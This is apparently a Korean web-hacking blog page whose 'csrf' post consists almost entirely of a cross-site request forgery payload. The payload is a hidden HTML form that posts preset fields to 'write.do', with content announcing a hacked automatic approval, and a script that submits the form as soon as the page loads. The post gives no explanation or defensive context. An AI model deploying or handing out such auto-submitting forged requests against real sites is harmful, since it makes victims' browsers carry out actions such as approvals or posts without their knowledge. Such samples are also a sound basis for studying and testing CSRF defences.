웹해킹 +2

1234

웹해킹2018. 5. 7. 15:12

'웹해킹' 카테고리의 다른 글

csrf  (0) 2017.12.13

csrf

웹해킹2017. 12. 13. 10:37
<body>
<form style="display:none" action="write.do" method="post" enctype="multipart/form-data">	
<input type="hidden" name="subject" value="자동결재"/>
<input type="hidden" name="writer" value="테스트" />
<input type="hidden" name="writerId" value="test" />
<input type="hidden" name="content" value="해킹되어서 자동 결재됩니다" />
<input type="file" name="file" />

<input type="submit" id="send" value="확인" />
</form>
<script>document.forms[0].send.click()</script>
</body>


'웹해킹' 카테고리의 다른 글

1234  (0) 2018.05.07